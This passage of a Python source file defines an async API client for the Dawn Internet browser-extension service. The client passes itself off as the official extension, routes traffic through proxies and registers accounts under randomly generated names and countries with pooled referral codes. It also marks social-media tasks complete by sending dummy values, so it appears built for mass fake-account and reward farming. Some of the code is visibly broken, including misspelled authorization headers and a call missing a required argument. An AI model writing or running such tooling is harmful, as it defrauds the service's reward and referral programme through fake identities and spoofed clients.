97 | )
98 | else:
99 | response = await self.session.get(
100 | url,
101 | params=params,
102 | headers=headers if headers else self.session.headers,
103 | cookies=cookies,
104 | )
105 |
106 | if verify:
107 | if response.status_code == 403 and "403 Forbidden" in response.text:
108 | raise ProxyForbidden(f"Proxy forbidden - {response.status_code}")
109 | elif response.status_code == 403:
110 | raise SessionRateLimited("Session is rate limited or blocked by Cloudflare")
111 |
112 | if response.status_code in (500, 502, 503, 504):
113 | raise ServerError(f"Server error - {response.status_code}")
114 |
115 | try:
116 | response_json = response.json()
117 | await self._verify_response(response_json)
118 | return response_json
119 | except json.JSONDecodeError:
120 | raise ServerError(f"Failed to decode response, most likely server error")
121 |
122 | return response.text
123 |
124 | except ServerError as error:
125 | if attempt == max_retries - 1:
126 | raise error
127 | await asyncio.sleep(retry_delay)
128 |
129 | except (APIError, SessionRateLimited, ProxyForbidden):
130 | raise
131 |
132 | except Exception as error:
133 | if attempt == max_retries - 1:
134 | raise ServerError(
135 | f"Failed to send request after {max_retries} attempts: {error}"
136 | )
137 | await asyncio.sleep(retry_delay)
138 |
139 | raise ServerError(f"Failed to send request after {max_retries} attempts")
140 |
141 |
142 | class DawnExtensionAPI(APIClient):
143 | def __init__(self, auth_token: str = None, proxy: str = None):
144 | super().__init__(proxy)
145 | self.auth_token = auth_token
146 |
147 | async def get_puzzle_id(self, app_id: str) -> str:
148 | headers = {
149 | 'user-agent': self.user_agent,
150 | 'accept': '*/*',
151 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
152 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
153 | 'host': 'ext-api.dawninternet.com',
154 | }
155 |
156 | response = await self.send_request(
157 | api_type="DASHBOARD",
158 | method="/v1/puzzle/get-puzzle",
159 | request_type="GET",
160 | params={"appid": app_id},
161 | headers=headers,
162 | )
163 | return response["puzzle_id"]
164 |
165 | async def get_puzzle_image(self, puzzle_id: str, app_id: str) -> str:
166 | headers = {
167 | 'user-agent': self.user_agent,
168 | 'accept': '*/*',
169 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
170 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
171 | 'host': 'ext-api.dawninternet.com',
172 | }
173 |
174 | response = await self.send_request(
175 | api_type="DASHBOARD",
176 | method="/v1/puzzle/get-puzzle-image",
177 | request_type="GET",
178 | params={"puzzle_id": puzzle_id, "appid": app_id},
179 | headers=headers,
180 | )
181 |
182 | return response.get("imgBase64")
183 |
184 |
185 | async def get_app_id(self) -> str:
186 | headers = {
187 | 'user-agent': self.user_agent,
188 | 'accept': '*/*',
189 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
190 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
191 | 'host': 'ext-api.dawninternet.com',
192 | }
193 |
194 | params = {
195 | 'app_v': '1.1.4',
196 | }
197 |
198 | response = await self.send_request(
199 | api_type="DASHBOARD",
200 | method="/v1/appid/getappid",
201 | request_type="GET",
202 | params=params,
203 | headers=headers,
204 | )
205 |
206 | return response["data"]["appid"]
207 |
208 | async def register(self, email: str, password: str, captcha_token: str, app_id: str) -> dict:
209 | headers = {
210 | 'user-agent': self.user_agent,
211 | 'accept': 'application/json, text/plain, */*',
212 | 'content-type': 'application/json',
213 | 'origin': 'https://dashboard.dawninternet.com',
214 | 'referer': 'https://dashboard.dawninternet.com/',
215 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
216 | 'accept-encoding': 'gzip, deflate, br'
217 | }
218 |
219 | json_data = {
220 | 'firstname': names.get_first_name(),
221 | 'lastname': names.get_last_name(),
222 | 'email': email,
223 | 'mobile': '',
224 | 'country': random.choice([
225 | 'AL', 'AD', 'AT', 'BY', 'BE', 'BA', 'BG', 'HR', 'CZ', 'DK',
226 | 'EE', 'FI', 'FR', 'DE', 'GR', 'HU', 'IS', 'IE', 'IT', 'LV',
227 | 'LI', 'LT', 'LU', 'MT', 'MD', 'MC', 'ME', 'NL', 'MK', 'NO',
228 | 'PL', 'PT', 'RO', 'RU', 'SM', 'RS', 'SK', 'SI', 'ES', 'SE',
229 | 'CH', 'UA', 'GB', 'VA', 'UA'
230 | ]),
231 | 'password': password,
232 | 'referralCode': random.choice(config.referral_codes) if config.referral_codes else "",
233 | 'token': captcha_token,
234 | 'isMarketing': False,
235 | 'browserName': 'chrome',
236 | }
237 |
238 | return await self.send_request(
239 | api_type="DASHBOARD",
240 | method="/v2/dashboard/user/validate-register",
241 | json_data=json_data,
242 | params={"appid": app_id},
243 | headers=headers,
244 | )
245 |
246 | @require_auth_token
247 | async def keepalive(self, email: str, app_id: str) -> dict | str:
248 | headers = {
249 | 'user-agent': self.user_agent,
250 | 'content-type': 'application/json',
251 | 'authorization': f'Berear {self.auth_token}',
252 | 'accept': '*/*',
253 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
254 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
255 | 'accept-encoding': 'gzip, deflate, br'
256 | }
257 |
258 | json_data = {
259 | "username": email,
260 | "extensionid": "fpdkjdnhkakefebpekbdhillbhonfjjp",
261 | "numberoftabs": 0,
262 | "_v": "1.1.4",
263 | }
264 |
265 | return await self.send_request(
266 | method="/v1/userreward/keepalive",
267 | json_data=json_data,
268 | verify=False,
269 | headers=headers,
270 | params={"appid": app_id},
271 | )
272 |
273 | @require_auth_token
274 | async def user_info(self, app_id: str) -> dict:
275 | headers = {
276 | 'authorization': f'Berear {self.auth_token}',
277 | 'user-agent': self.user_agent,
278 | 'content-type': 'application/json',
279 | 'accept': '*/*',
280 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
281 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
282 | 'accept-encoding': 'gzip, deflate, br'
283 | }
284 |
285 | response = await self.send_request(
286 | url="https://www.aeropres.in/api/atom/v1/userreferral/getpoint",
287 | request_type="GET",
288 | headers=headers,
289 | params={"appid": app_id},
290 | )
291 |
292 | return response["data"]
293 |
294 | async def verify_registration(self, key: str, captcha_token: str) -> dict:
295 | headers = {
296 | 'user-agent': self.user_agent,
297 | 'content-type': 'application/json',
298 | 'accept': '*/*',
299 | 'origin': 'https://verify.dawninternet.com',
300 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
301 | 'accept-encoding': 'gzip, deflate, br'
302 | }
303 |
304 | return await self.send_request(
305 | url='https://verify.dawninternet.com/chromeapi/dawn/v1/userverify/verifycheck',
306 | json_data={"token": captcha_token},
307 | headers=headers,
308 | params={"key": key},
309 | )
310 |
311 | async def resend_verify_link(self, email: str, puzzle_id: str, answer: str, app_id: str) -> dict:
312 | headers = {
313 | 'accept': '*/*',
314 | 'accept-language': 'en-US,en;q=0.9,ru;q=0.8',
315 | 'content-type': 'application/json',
316 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
317 | 'user-agent': self.user_agent,
318 | }
319 |
320 | json_data = {
321 | 'username': email,
322 | 'puzzle_id': puzzle_id,
323 | 'ans': answer,
324 | }
325 |
326 | return await self.send_request(
327 | method="/v1/user/resendverifylink/v2",
328 | json_data=json_data,
329 | params={"appid": app_id},
330 | headers=headers,
331 | )
332 |
333 | @require_auth_token
334 | async def complete_tasks(self, app_id: str, tasks: list[str] = None, delay: int = 1) -> None:
335 | if not tasks:
336 | tasks = ["telegramid", "discordid", "twitter_x_id"]
337 |
338 | headers = {
339 | 'authorization': f'Brearer {self.auth_token}',
340 | 'user-agent': self.user_agent,
341 | 'content-type': 'application/json',
342 | 'accept': '*/*',
343 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
344 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
345 | 'accept-encoding': 'gzip, deflate, br'
346 | }
347 |
348 | for task in tasks:
349 | await self.send_request(
350 | method="/v1/profile/update",
351 | json_data={task: task},
352 | headers=headers,
353 | params={"appid": app_id},
354 | )
355 |
356 | await asyncio.sleep(delay)
357 |
358 | async def verify_session(self) -> tuple[bool, str]:
359 | try:
360 | await self.user_info()
361 | return True, "Session is valid"
362 |
363 | except ServerError:
364 | return True, "Server error"
365 |
366 | except APIError as error:
367 | return False, str(error)
368 |
369 | async def login(self, email: str, password: str, puzzle_id: str, answer: str, app_id: str) -> str:
370 | headers = {
371 | 'user-agent': self.user_agent,
372 | 'content-type': 'application/json',
373 | 'accept': '*/*',
374 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
375 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
376 | 'accept-encoding': 'gzip, deflate, br'
377 | }
378 |
379 | current_time = datetime.now(timezone.utc)
380 | formatted_datetime_str = (
381 | current_time.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z"
382 | )
383 |
384 | json_data = {
385 | "username": email,
386 | "password": password,
387 | "logindata": {
388 | '_v': {
389 | 'version': '1.1.4',
390 | },
391 | 'datetime': formatted_datetime_str,
392 | },
393 | "puzzle_id": puzzle_id,
394 | "ans": answer,
395 | "appid": app_id,
396 | }
397 |
398 | response = await self.send_request(
399 | method="/v1/user/login/v2",
400 | json_data=json_data,
401 | params={"appid": app_id},
402 | headers=headers,
403 | )
404 |
405 | bearer = response.get("data", {}).get("token")
406 | if bearer:
407 | return bearer
408 | else:
409 | raise APIError(f"Failed to login: {response}")
410 |
--------------------------------------------------------------------------------